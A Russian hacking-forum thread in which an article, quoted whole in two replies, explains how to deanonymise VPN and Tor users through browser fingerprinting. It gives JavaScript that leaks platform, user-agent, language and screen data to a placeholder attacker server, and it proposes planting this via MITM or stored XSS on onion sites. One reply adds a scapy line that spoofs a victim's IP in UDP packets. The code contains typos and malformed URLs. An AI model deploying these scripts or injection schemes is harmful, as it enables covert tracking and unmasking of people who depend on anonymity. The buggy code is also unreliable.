• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья Деанонимизация пользователей. Введение.

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
521
#1
Многие думают, что раз они настроили VPN или Tor, то шанс, что их вычислят равен 0. Они не правы. Вообще, что значит сам термин Деанонимизация ?
Деанонимизация - это нарушение анонимности, когда о вас узнают, то что вы скрывали начиная от ip адреса, заканчивая Именем и Фамилией. Все мы оставляем некие цифровые следы или как их еще называют кибер тень. Это информация о нас как долго мы находились в сети, наши куки, информация о разрешении нашего монитора, установленных в системе шрифтов, часового пояса, какие плагины установлены в вашем браузере. Из всех полученных данных составляют цифровой след. Далее идет система мониторинга, т.е идет сравнение следа, где и какие сайты вы посещали. Соглашусь, что звучит это как-то нереально, это действительно рабочий способ, давно применяемый на практике. Итак, давайте приступим к написания скрипта.

Первое, что нам нужно узнать - это OC:
JavaScript:
var pic = new Image();
pic.src = 'http:Youserver//?info='+navigator.platform; // OC
Далее нам нужно собрать HTTP заголовки и информацию о браузере:
JavaScript:
pic.src ='http:Youserver//?info='+ navigator.appName     //Имя браузера
pic.src = 'http:Youserver//?info='+ navigator.userAgent   //Агент пользователя
pic.src = 'http:Youserver//?info='+ navigator.appVersion  //Версия броузера
pic.src = 'http:Youserver//?info='+ lnavigator.language   //Язык системы
Далее соберем как можно более подробную информацию о компьютере:
JavaScript:
pic.src = +screen.width      //Ширина монитора
pic.scr = 'http:Youserver//?info='+screen.height     //Высота  монитора
pic.src = 'http:Youserver//?info='+screen.pixelDepth //Разрешение монитора
pic.src = 'http:Youserver//?info='+screen.colorDepth //Цетовая гамма
А этот код выведет оставшуюся информацию из объекта navigator:
JavaScript:
for(var prop in navigator) {
if (navigator[prop] instanceof Object || navigator[prop]==='') continue
conole.log(prop+": "+navigator[prop])
}
Так как это вводная статья мы остановимся. И перейдем к способам деанонимизации Tor. Итак, допустим наша цель пользуется Tor и чувствует себя вполне безопасно. Что же мы можем сделать, мы можем провести MITM атаку и вставить Javascript код во все посещаемые страницы. Можем поднять подготовленную страницу под определенную аудиторию, допустим наша цель любит Хакерские форумы. Найти уязвимые к хранимым XSS сайты и вставить наш код. Исследователи просканировали 100 onion сайтов и 30% из них были уязвимы к XSS. Мы можем собрать уникальную БД цифровых следов. Идентифицировать Tor пользователя можно использую функцию:
Код:
 measureText() и getBoundingClientRect()
Если мы получим уникальное значение, то мы сможем идентифицировать пользователя. Первая функция измеряет ширину текста, а вторая позволяют узнать ширину и высоту прямоугольника. Еще способы идентификации это измерить скорость взаимодействия с колёсиком мыши и получить характеристику CPU пользователя.



Noscript снизит риск всего на 50%. Так что сильно на него не надейтесь. Это была теоретическая статья и в следующей статье мы рассмотрим на практики, где в качестве цели будем идентифицировать пользователей уязвимого onion сайта. Пока насчет MITM атаки не знаю, но XSS будет точно.
 

0v3r_Cr1t

Премиум
16.02.2018
156
233
#2
Многие думают, что раз они настроили VPN или Tor, то шанс, что их вычислят равен 0. Они не правы. Вообще, что значит сам термин Деанонимизация ?
Деанонимизация - это нарушение анонимности, когда о вас узнают, то что вы скрывали начиная от ip адреса, заканчивая Именем и Фамилией. Все мы оставляем некие цифровые следы или как их еще называют кибер тень. Это информация о нас как долго мы находились в сети, наши куки, информация о разрешении нашего монитора, установленных в системе шрифтов, часового пояса, какие плагины установлены в вашем браузере. Из всех полученных данных составляют цифровой след. Далее идет система мониторинга, т.е идет сравнение следа, где и какие сайты вы посещали. Соглашусь, что звучит это как-то нереально, это действительно рабочий способ, давно применяемый на практике. Итак, давайте приступим к написания скрипта.

Первое, что нам нужно узнать - это OC:
JavaScript:
var pic = new Image();
pic.src = 'http:Youserver//?info='+navigator.platform; // OC
Далее нам нужно собрать HTTP заголовки и информацию о браузере:
JavaScript:
pic.src ='http:Youserver//?info='+ navigator.appName     //Имя браузера
pic.src = 'http:Youserver//?info='+ navigator.userAgent   //Агент пользователя
pic.src = 'http:Youserver//?info='+ navigator.appVersion  //Версия броузера
pic.src = 'http:Youserver//?info='+ lnavigator.language   //Язык системы
Далее соберем как можно более подробную информацию о компьютере:
JavaScript:
pic.src = +screen.width      //Ширина монитора
pic.scr = 'http:Youserver//?info='+screen.height     //Высота  монитора
pic.src = 'http:Youserver//?info='+screen.pixelDepth //Разрешение монитора
pic.src = 'http:Youserver//?info='+screen.colorDepth //Цетовая гамма
А этот код выведет оставшуюся информацию из объекта navigator:
JavaScript:
for(var prop in navigator) {
if (navigator[prop] instanceof Object || navigator[prop]==='') continue
conole.log(prop+": "+navigator[prop])
}
Так как это вводная статья мы остановимся. И перейдем к способам деанонимизации Tor. Итак, допустим наша цель пользуется Tor и чувствует себя вполне безопасно. Что же мы можем сделать, мы можем провести MITM атаку и вставить Javascript код во все посещаемые страницы. Можем поднять подготовленную страницу под определенную аудиторию, допустим наша цель любит Хакерские форумы. Найти уязвимые к хранимым XSS сайты и вставить наш код. Исследователи просканировали 100 onion сайтов и 30% из них были уязвимы к XSS. Мы можем собрать уникальную БД цифровых следов. Идентифицировать Tor пользователя можно использую функцию:
Код:
 measureText() и getBoundingClientRect()
Если мы получим уникальное значение, то мы сможем идентифицировать пользователя. Первая функция измеряет ширину текста, а вторая позволяют узнать ширину и высоту прямоугольника. Еще способы идентификации это измерить скорость взаимодействия с колёсиком мыши и получить характеристику CPU пользователя.



Noscript снизит риск всего на 50%. Так что сильно на него не надейтесь. Это была теоретическая статья и в следующей статье мы рассмотрим на практики, где в качестве цели будем идентифицировать пользователей уязвимого onion сайта. Пока насчет MITM атаки не знаю, но XSS будет точно.
Очень круто что затронул такую интересную тему, но она поможет только в случае когда человек использует : vpn tor и не поможет в случает когда в цепочке присутствует дедик
В общем пиши дальше конечно, но она скорее для деанонимизации среднестатистического юзера
 
Симпатии: Понравилось DefWolf

CenturionZ

New member
10.03.2018
3
2
#3
Многие думают, что раз они настроили VPN или Tor, то шанс, что их вычислят равен 0. Они не правы. Вообще, что значит сам термин Деанонимизация ?
Деанонимизация - это нарушение анонимности, когда о вас узнают, то что вы скрывали начиная от ip адреса, заканчивая Именем и Фамилией. Все мы оставляем некие цифровые следы или как их еще называют кибер тень. Это информация о нас как долго мы находились в сети, наши куки, информация о разрешении нашего монитора, установленных в системе шрифтов, часового пояса, какие плагины установлены в вашем браузере. Из всех полученных данных составляют цифровой след. Далее идет система мониторинга, т.е идет сравнение следа, где и какие сайты вы посещали. Соглашусь, что звучит это как-то нереально, это действительно рабочий способ, давно применяемый на практике. Итак, давайте приступим к написания скрипта.

Первое, что нам нужно узнать - это OC:
JavaScript:
var pic = new Image();
pic.src = 'http:Youserver//?info='+navigator.platform; // OC
Далее нам нужно собрать HTTP заголовки и информацию о браузере:
JavaScript:
pic.src ='http:Youserver//?info='+ navigator.appName     //Имя браузера
pic.src = 'http:Youserver//?info='+ navigator.userAgent   //Агент пользователя
pic.src = 'http:Youserver//?info='+ navigator.appVersion  //Версия броузера
pic.src = 'http:Youserver//?info='+ lnavigator.language   //Язык системы
Далее соберем как можно более подробную информацию о компьютере:
JavaScript:
pic.src = +screen.width      //Ширина монитора
pic.scr = 'http:Youserver//?info='+screen.height     //Высота  монитора
pic.src = 'http:Youserver//?info='+screen.pixelDepth //Разрешение монитора
pic.src = 'http:Youserver//?info='+screen.colorDepth //Цетовая гамма
А этот код выведет оставшуюся информацию из объекта navigator:
JavaScript:
for(var prop in navigator) {
if (navigator[prop] instanceof Object || navigator[prop]==='') continue
conole.log(prop+": "+navigator[prop])
}
Так как это вводная статья мы остановимся. И перейдем к способам деанонимизации Tor. Итак, допустим наша цель пользуется Tor и чувствует себя вполне безопасно. Что же мы можем сделать, мы можем провести MITM атаку и вставить Javascript код во все посещаемые страницы. Можем поднять подготовленную страницу под определенную аудиторию, допустим наша цель любит Хакерские форумы. Найти уязвимые к хранимым XSS сайты и вставить наш код. Исследователи просканировали 100 onion сайтов и 30% из них были уязвимы к XSS. Мы можем собрать уникальную БД цифровых следов. Идентифицировать Tor пользователя можно использую функцию:
Код:
 measureText() и getBoundingClientRect()
Если мы получим уникальное значение, то мы сможем идентифицировать пользователя. Первая функция измеряет ширину текста, а вторая позволяют узнать ширину и высоту прямоугольника. Еще способы идентификации это измерить скорость взаимодействия с колёсиком мыши и получить характеристику CPU пользователя.



Noscript снизит риск всего на 50%. Так что сильно на него не надейтесь. Это была теоретическая статья и в следующей статье мы рассмотрим на практики, где в качестве цели будем идентифицировать пользователей уязвимого onion сайта. Пока насчет MITM атаки не знаю, но XSS будет точно.
Все конечно круто, сам давно изучаю этот вопрос. Но тут есть одна хитрость-виртуалка. Что мешает теперь подогнать в vmware любую ОСь и пропустить через Whonix шлюх? Смена всех твоих отпечатков будет по default. Так что не парься. А вообще если посерфить просто, юзай Tails и будет тебе счастье. Если захочешь скрыть трафик от провайдера, настройка VPN перед тем как в сеть выйти и потом уже в TOR
 

swap3r

Премиум
06.11.2016
61
48
#4
Хорошая и полезная статья о "пишем сами детекты для whoer.net" :)
Фактически, очень полезно сделать свой ресурс такого плана, для тестировки и обратной связи для своих различных ботов и веб-скраперов, чтобы проверять, насколько корректно фингерпринты генерятся.
 

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 233
2 721
#5

0v3r_Cr1t

Премиум
16.02.2018
156
233
#8
Очень круто что затронул такую интересную тему, но она поможет только в случае когда человек использует : vpn tor и не поможет в случает когда в цепочке присутствует дедик
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
521
#9
И ты прав, в след. статье сделаю небольшое отступление от взлома onion и расскажу о дедике.
 

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 233
2 721
#10
Ваше --> Очень круто что затронул такую интересную тему, но она поможет только в случае когда человек использует : vpn tor и не поможет в случает когда в цепочке присутствует дедик

Мое --> Вот именно такие и совершают провалы, ощущая себя под защитой.

Данным коментарием, я выражаю мысль: 80% людей, начавших свой жизненный цикл в теме ИБ, кроме как ВПН и ТОР не знают, для них это панацея от всех болезней. Как следствие, люди выходят на разного рода подвиги, обувшись в ТОР и обернув себя ВПН, и при нужном или не нужном исходе события оказываются раскрыты, к примеру по той схеме, как описал топик стартер.

Я констатитрую факт через Ваше высказывание.
 
01.11.2016
10
5
#12
Написано все грамотно.
Но это только для начинающих.

В реалиях, упертые красноглазиги страдающие паранойей гораздо сильнее усложняют задачу следящему.
 
13.03.2018
1
0
#14
И ни слова про выходную ноду тора....которую нужно поднимать самим... )
 
23.07.2016
5
2
#15
Да и как же без Beef'а в случае если есть конкретная цель и вектор - XSS
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
521
#16
Оба коммента выше, так и не поняли, о чем здесь, мы деанонимизируем, а не защищаемся,на codeby много статей уже написано про анонимность, и вместо Beef, мы будем использовать другой инструмент специально написанный для этих целей
 

ANR

Active member
12.12.2017
39
24
#17
самые уязвимые места для деанона это
DNS
http
Java Script
WebRTC
flash
...
в каждой из этих технологий есть масса уязвимостей которые ведут к 100% деанону.
соответственно отключив их..
вот тогда было бы интересно почитать что еще уязвимо, какие технологии. а так это из пустого в порожнее переливать.
dns открытым текстом на 53 порту, http открытым текстом, java script определяет все параметры браузера и системы,
webrtc вообще traceroute но со стороны сайта, flash..
все это давно известно лет как 10 и не пинает разве что совсем ленивый
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
521
#18
самые уязвимые места для деанона это
DNS
http
Java Script
WebRTC
flash
...
в каждой из этих технологий есть масса уязвимостей которые ведут к 100% деанону.
соответственно отключив их..
вот тогда было бы интересно почитать что еще уязвимо, какие технологии. а так это из пустого в порожнее переливать.
dns открытым текстом на 53 порту, http открытым текстом, java script определяет все параметры браузера и системы,
webrtc вообще traceroute но со стороны сайта, flash..
все это давно известно лет как 10 и не пинает разве что совсем ленивый
Это были новые методы деадона открытые менее года назад, про dns и http и так все знают и они уже давно как не рабочие, т.к. уязвимости заделывают, попробуй одной из перечисленных технологий сделать деадон. Но я рассмотрю эти технологии в след. статье вместе с практикой.
это то все понятно, проблема в другом, в dump трафике видно что что-то происходит с ip жертвы, не стал разбираться, заменил прямо в коде
packet = send(IP(dst=servers, src='MY_TEST_IP')/UDP(dport=port)/Raw(load=data), count=int(powers))

Если я правильно понял, нужно посылать от имени IP жертвы, и надеяться, что по сему пути, провайдеры не выкинут такие пакеты..
Он у большинства года как 3 закрыт. К 100% деадону в TOR ни один из твоих способов не приведет, можешь сам проверить на практике.
 
Последнее редактирование:

ANR

Active member
12.12.2017
39
24
#19
Это были новые методы деадона открытые менне года назад, про dns и http и так все знают
какие новые?) похожие Java Script как в статье, были на сайте например 2ip.ru еще году в 2006
flash тоже самое
WebRTC относительно новая технология, но и ей уже года 3-4
 

DefWolf

Mod. Cryptography
Red Team
24.10.2017
211
521
#20
какие новые?) похожие Java Script как в статье, были на сайте например 2ip.ru еще году в 2006
flash тоже самое
WebRTC относительно новая технология, но и ей уже года 3-4
Новые всмысле определять пользователя по движении мышки, шрифтам, получить характеристику CPU =) . Это позволяет составить более уникальный цифровой след. И самое интересное, что разработчики заявили, что они не будут блокировать эти функции. Это была 1 часть статьи. В дальнейшим мы рассмотрим еще пару способов уже более интересных на практике.
 
Последнее редактирование:
Вверх Снизу